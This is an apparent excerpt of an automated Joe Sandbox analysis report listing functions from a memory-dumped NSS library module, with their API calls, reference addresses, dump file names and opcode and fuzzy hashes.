                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 811965633-0
                                                                                                                                                                                                                                                      • Opcode ID: 7cfc1330e3eb48d672cfbaaec6d9a35c54425f9c8fbff917622fc46a91cb1772
                                                                                                                                                                                                                                                      • Instruction ID: e3846dac8e25f295d322a2b58b9beb2c163f84e87a849ad2926ae8ab1988c1ec
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7cfc1330e3eb48d672cfbaaec6d9a35c54425f9c8fbff917622fc46a91cb1772
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB4137B4A06A22DFC704CF29C98095AFBF1FF88318725856AD959CBB51E731E850CF90
                                                                                                                                                                                                                                                      Function 6C547DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547E10
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547EA6
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547EB5
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C547ED8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4101233201-0
                                                                                                                                                                                                                                                      • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                                                      • Instruction ID: 729386f416a8a38842f4134daee79746ecc5324be2f3268c2bbbe254574dae3a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4231A4B1A011118FDB04CF18CC9099EBBE2BFC831871B8669C8585BB12EB71EC55CBD1
                                                                                                                                                                                                                                                      Function 6C4FDF00 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C49AE42), ref: 6C4830AA
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4830C7
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C4830E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C483116
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C48312B
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PK11_DestroyObject.NSS3(?,?), ref: 6C483154
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C48317E
                                                                                                                                                                                                                                                      • SECKEY_CopyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C4FDBBD), ref: 6C4FDFCF
                                                                                                                                                                                                                                                      • SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4FDFEE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4986D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C498716
                                                                                                                                                                                                                                                        • Part of subcall function 6C4986D0: TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C498727
                                                                                                                                                                                                                                                        • Part of subcall function 6C4986D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C49873B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4986D0: PR_Unlock.NSS3(?), ref: 6C49876F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4986D0: PR_SetError.NSS3(00000000,00000000), ref: 6C498787
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C4BF854
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C4BF868
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C4BF882
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C4BF889
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C4BF8A4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C4BF8AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C4BF8C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C4BF8D0
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,6C4FDBBD), ref: 6C4FDFFC
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,?,6C4FDBBD), ref: 6C4FE007
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Utilfree$CriticalSection$DeleteDestroy$Arena_CopyErrorK11_Private$AlgorithmAlloc_ArenaAuthenticateEnterFreeItem_ObjectPublicTag_UnlockValuememset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3730430729-0
                                                                                                                                                                                                                                                      • Opcode ID: 3ac3b98e3f5be8536b347307e4a21c6e1f2f725d792f7386c4d39a7d5fc2ffa8
                                                                                                                                                                                                                                                      • Instruction ID: 422770f80ad250f4658458c3f5237ea45c6302ac3342e1bf4af9b36e86da6a40
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ac3b98e3f5be8536b347307e4a21c6e1f2f725d792f7386c4d39a7d5fc2ffa8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9831E4B0A0520157E700EE79AC85F9B73B89F8530DF050139E91AD7B12FB25E909C2F2
                                                                                                                                                                                                                                                      Function 6C476C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C476C8D
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C476CA9
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C476CC0
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C598FE0), ref: 6C476CFE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2370200771-0
                                                                                                                                                                                                                                                      • Opcode ID: 244385f3578d83f37ca9adba8f98bf9d1577fd52ab100560e848372b7bb17677
                                                                                                                                                                                                                                                      • Instruction ID: ee4467573021c97f3681aa39ca6a646853cf66b353c82cec8130079f225be18b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 244385f3578d83f37ca9adba8f98bf9d1577fd52ab100560e848372b7bb17677
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15319EB5A012169FEB18DF65C891EFFBBFAEB45248B10442DD905D7700EB319905CBA0
                                                                                                                                                                                                                                                      Function 6C584F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C584F5D
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C584F74
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C584F82
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C584F90
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$CreateErrorFileLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 17951984-0
                                                                                                                                                                                                                                                      • Opcode ID: 6aca86e0f592b39e87ab1cf1ef6b8ee23b938de03b229daa086d3256f519f972
                                                                                                                                                                                                                                                      • Instruction ID: b737a11ea2e4bd8b229a847f1895bf220286905af329ca73929f15823929680d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6aca86e0f592b39e87ab1cf1ef6b8ee23b938de03b229daa086d3256f519f972
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC3148B5A016294BEB01CB69DC91BDFB3BCFF85348F05022DEC15A7780EB34A905C691
                                                                                                                                                                                                                                                      Function 6C4CDDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C4CDDB1,?,00000000), ref: 6C4CDDF4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C4CDDB1,?,00000000), ref: 6C4CDE0B
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C4CDDB1,?,00000000), ref: 6C4CDE17
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C4CDE80
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3725328900-0
                                                                                                                                                                                                                                                      • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                                                      • Instruction ID: 4c979dc6d2b5743ad676ddee041ea5e964990721235e655728530f1808123b8d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D731D6B5A41B429BE700CF56C890E52F7E4FFA5318B24822ED81C87B11E770F4A4CB82
                                                                                                                                                                                                                                                      Function 6C4BFE20 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(6C495ADC,?,00000000,00000001,?,?,00000000,?,6C48BA55,?,?), ref: 6C4BFE4B
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4BFE5F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(78831D74), ref: 6C4BFEC2
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4BFED6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 284873373-0
                                                                                                                                                                                                                                                      • Opcode ID: 8139b48b1f2fc905f96385cdd5b14ad866a0951d1c01acdd5acca26b74c533dd
                                                                                                                                                                                                                                                      • Instruction ID: eca3eb02c99a94bbb6204d35a1e1de17acbb75dc241f2a793b920156daec475d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8139b48b1f2fc905f96385cdd5b14ad866a0951d1c01acdd5acca26b74c533dd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C21E139A026259BE700EA28DC44FAAB3B4FF05359F450128ED0967F42E731B964CBE0
                                                                                                                                                                                                                                                      Function 6C4C3F50 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: PK11_GetAllTokens.NSS3 ref: 6C4C3481
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C4C34A3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: TlsGetValue.KERNEL32 ref: 6C4C352E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: EnterCriticalSection.KERNEL32(?), ref: 6C4C3542
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: PR_Unlock.NSS3(?), ref: 6C4C355B
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C4AE80C,00000000,00000000,?,?,?,?,6C4B8C5B,-00000001), ref: 6C4C3FA1
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C4AE80C,00000000,00000000,?,?,?,?,6C4B8C5B,-00000001), ref: 6C4C3FBA
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6C4AE80C,00000000,00000000,?,?,?,?,6C4B8C5B,-00000001), ref: 6C4C3FFE
                                                                                                                                                                                                                                                      • PR_SetError.NSS3 ref: 6C4C401A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue$K11_Tokens
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3021504977-0
                                                                                                                                                                                                                                                      • Opcode ID: 493220cfc02ca15205e787e755885febee032f4574e451a6b7e700347fa14eef
                                                                                                                                                                                                                                                      • Instruction ID: 6f825fac5de1b7182bc1fd0c7ae4d7a303302ef0a0fdc6bcad4874fd80e537d6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 493220cfc02ca15205e787e755885febee032f4574e451a6b7e700347fa14eef
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39314174604704CFD710EF69D584ABABBF0BF85355F01592DD8898BB10EB30E985CB96
                                                                                                                                                                                                                                                      Function 6C4B4FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B5003
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B501C
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B504B
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B5064
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterSectionUnlockValuefree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1112172411-0
                                                                                                                                                                                                                                                      • Opcode ID: 649b1c55063d5d591ecdb53fc65da74d71276e4bb65e5543d92fb2ee069cb280
                                                                                                                                                                                                                                                      • Instruction ID: 0e770dfa2f12cdbb82abe8eb44a789e3d1ae6e29b783663b52bea516ff2a5d51
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 649b1c55063d5d591ecdb53fc65da74d71276e4bb65e5543d92fb2ee069cb280
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC3129B4A05A06CFDB00EF68C484A6AFBF4FF09305B11852DD859AB700E730E990CBE5
                                                                                                                                                                                                                                                      Function 6C4D9F80 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?,6C4DA71A,FFFFFFFF,?,?), ref: 6C4D9FAB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,?,?,00000000,6C4DA71A,6C4DA71A,00000000), ref: 6C4D9FD9
